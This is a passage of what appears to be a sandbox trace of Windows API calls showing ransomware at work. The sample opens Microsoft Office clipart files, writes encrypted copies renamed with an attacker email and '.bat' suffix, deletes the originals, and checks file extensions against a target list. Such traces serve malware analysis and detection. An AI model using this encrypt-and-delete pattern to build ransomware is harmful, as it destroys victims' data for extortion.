lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.076] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.076] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.076] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.077] GetLastError () returned 0x0 [0197.077] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x4464, lpOverlapped=0x0) returned 1 [0197.079] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x4470, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x4470, lpOverlapped=0x0) returned 1 [0197.081] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.081] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.081] SetEndOfFile (hFile=0x3a4) returned 1 [0197.081] CloseHandle (hObject=0x3a4) returned 1 [0197.081] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.081] SetEndOfFile (hFile=0x358) returned 1 [0197.082] CloseHandle (hObject=0x358) returned 1 [0197.083] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.083] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153398.wmf")) returned 1 [0197.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.083] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.083] lstrlenW (lpString=".doc") returned 4 [0197.083] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.083] lstrlenW (lpString=".docx") returned 5 [0197.083] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0197.083] lstrlenW (lpString=".pdf") returned 4 [0197.083] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.083] lstrlenW (lpString=".xls") returned 4 [0197.083] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.083] lstrlenW (lpString=".xlsx") returned 5 [0197.083] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0197.083] lstrlenW (lpString=".ppt") returned 4 [0197.083] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.084] lstrlenW (lpString=".zip") returned 4 [0197.084] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.084] lstrlenW (lpString=".rar") returned 4 [0197.084] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString=".bz2") returned 4 [0197.084] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString=".7z") returned 3 [0197.084] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.084] lstrlenW (lpString=".dbf") returned 4 [0197.084] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.084] lstrlenW (lpString=".1cd") returned 4 [0197.084] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.084] lstrlenW (lpString=".jpg") returned 4 [0197.084] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.084] lstrlenW (lpString=".doc") returned 4 [0197.084] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString=".docx") returned 5 [0197.084] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0197.084] lstrlenW (lpString=".pdf") returned 4 [0197.084] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.084] lstrlenW (lpString=".xls") returned 4 [0197.084] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.085] lstrlenW (lpString=".xlsx") returned 5 [0197.085] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0197.085] lstrlenW (lpString=".ppt") returned 4 [0197.085] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.085] lstrlenW (lpString=".zip") returned 4 [0197.085] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.085] lstrlenW (lpString=".rar") returned 4 [0197.085] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.085] lstrlenW (lpString=".bz2") returned 4 [0197.085] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.085] lstrlenW (lpString=".7z") returned 3 [0197.085] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.085] lstrlenW (lpString=".dbf") returned 4 [0197.085] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.085] lstrlenW (lpString=".1cd") returned 4 [0197.085] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153398.WMF") returned 68 [0197.085] lstrlenW (lpString=".jpg") returned 4 [0197.085] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.085] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.085] lstrlenW (lpString="J0153508.WMF") returned 12 [0197.086] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.086] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=34256) returned 1 [0197.086] CloseHandle (hObject=0x358) returned 1 [0197.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf")) returned 0x220 [0197.086] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.087] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.087] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.087] GetLastError () returned 0x0 [0197.087] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x85d0, lpOverlapped=0x0) returned 1 [0197.090] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x85e0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x85e0, lpOverlapped=0x0) returned 1 [0197.091] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.091] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.092] SetEndOfFile (hFile=0x3a4) returned 1 [0197.092] CloseHandle (hObject=0x3a4) returned 1 [0197.092] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.092] SetEndOfFile (hFile=0x358) returned 1 [0197.093] CloseHandle (hObject=0x358) returned 1 [0197.093] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.093] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153508.wmf")) returned 1 [0197.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.093] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.093] lstrlenW (lpString=".doc") returned 4 [0197.093] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.093] lstrlenW (lpString=".docx") returned 5 [0197.093] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0197.093] lstrlenW (lpString=".pdf") returned 4 [0197.093] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.093] lstrlenW (lpString=".xls") returned 4 [0197.093] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.093] lstrlenW (lpString=".xlsx") returned 5 [0197.093] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0197.094] lstrlenW (lpString=".ppt") returned 4 [0197.094] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.094] lstrlenW (lpString=".zip") returned 4 [0197.094] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.094] lstrlenW (lpString=".rar") returned 4 [0197.094] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString=".bz2") returned 4 [0197.094] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString=".7z") returned 3 [0197.094] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.094] lstrlenW (lpString=".dbf") returned 4 [0197.094] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.094] lstrlenW (lpString=".1cd") returned 4 [0197.094] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.094] lstrlenW (lpString=".jpg") returned 4 [0197.094] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.094] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.094] lstrlenW (lpString=".doc") returned 4 [0197.094] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString=".docx") returned 5 [0197.094] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0197.094] lstrlenW (lpString=".pdf") returned 4 [0197.094] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.094] lstrlenW (lpString=".xls") returned 4 [0197.094] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.094] lstrlenW (lpString=".xlsx") returned 5 [0197.094] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0197.094] lstrlenW (lpString=".ppt") returned 4 [0197.094] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.095] lstrlenW (lpString=".zip") returned 4 [0197.095] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.095] lstrlenW (lpString=".rar") returned 4 [0197.095] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.095] lstrlenW (lpString=".bz2") returned 4 [0197.095] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.095] lstrlenW (lpString=".7z") returned 3 [0197.095] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.095] lstrlenW (lpString=".dbf") returned 4 [0197.095] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.095] lstrlenW (lpString=".1cd") returned 4 [0197.095] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.095] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153508.WMF") returned 68 [0197.095] lstrlenW (lpString=".jpg") returned 4 [0197.095] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.095] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.095] lstrlenW (lpString="J0153514.WMF") returned 12 [0197.095] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.096] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=12752) returned 1 [0197.096] CloseHandle (hObject=0x358) returned 1 [0197.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf")) returned 0x220 [0197.096] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.096] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.096] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.096] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0197.097] GetLastError () returned 0x0 [0197.097] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x31d0, lpOverlapped=0x0) returned 1 [0197.099] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0x31e0, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0x31e0, lpOverlapped=0x0) returned 1 [0197.100] ReadFile (in: hFile=0x358, lpBuffer=0x3b06020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fdfecc, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesRead=0x2fdfecc*=0x0, lpOverlapped=0x0) returned 1 [0197.100] WriteFile (in: hFile=0x3a4, lpBuffer=0x3b06020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fdfc94, lpOverlapped=0x0 | out: lpBuffer=0x3b06020*, lpNumberOfBytesWritten=0x2fdfc94*=0xec, lpOverlapped=0x0) returned 1 [0197.100] SetEndOfFile (hFile=0x3a4) returned 1 [0197.100] CloseHandle (hObject=0x3a4) returned 1 [0197.100] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.100] SetEndOfFile (hFile=0x358) returned 1 [0197.101] CloseHandle (hObject=0x358) returned 1 [0197.101] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0197.101] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153514.wmf")) returned 1 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.102] lstrlenW (lpString=".doc") returned 4 [0197.102] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString=".docx") returned 5 [0197.102] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0197.102] lstrlenW (lpString=".pdf") returned 4 [0197.102] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString=".xls") returned 4 [0197.102] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.102] lstrlenW (lpString=".xlsx") returned 5 [0197.102] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0197.102] lstrlenW (lpString=".ppt") returned 4 [0197.102] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.102] lstrlenW (lpString=".zip") returned 4 [0197.102] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.102] lstrlenW (lpString=".rar") returned 4 [0197.102] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString=".bz2") returned 4 [0197.102] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString=".7z") returned 3 [0197.102] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.102] lstrlenW (lpString=".dbf") returned 4 [0197.102] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.102] lstrlenW (lpString=".1cd") returned 4 [0197.102] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.102] lstrlenW (lpString=".jpg") returned 4 [0197.102] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.102] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.103] lstrlenW (lpString=".doc") returned 4 [0197.103] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString=".docx") returned 5 [0197.103] lstrcmpiW (lpString1=".docx", lpString2="4.WMF") returned -1 [0197.103] lstrlenW (lpString=".pdf") returned 4 [0197.103] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString=".xls") returned 4 [0197.103] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0197.103] lstrlenW (lpString=".xlsx") returned 5 [0197.103] lstrcmpiW (lpString1=".xlsx", lpString2="4.WMF") returned -1 [0197.103] lstrlenW (lpString=".ppt") returned 4 [0197.103] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.103] lstrlenW (lpString=".zip") returned 4 [0197.103] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0197.103] lstrlenW (lpString=".rar") returned 4 [0197.103] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString=".bz2") returned 4 [0197.103] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString=".7z") returned 3 [0197.103] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0197.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.103] lstrlenW (lpString=".dbf") returned 4 [0197.103] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.103] lstrlenW (lpString=".1cd") returned 4 [0197.103] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0197.103] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153514.WMF") returned 68 [0197.103] lstrlenW (lpString=".jpg") returned 4 [0197.103] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0197.103] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0197.104] lstrlenW (lpString="J0153516.WMF") returned 12 [0197.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.104] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x2fdff14 | out: lpFileSize=0x2fdff14*=7432) returned 1 [0197.104] CloseHandle (hObject=0x358) returned 1 [0197.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf")) returned 0x220 [0197.104] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0197.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0153516.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0153516.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0197.105] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 [0197.105] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fdfec0 | out: lpNewFilePointer=0x0) returned 1 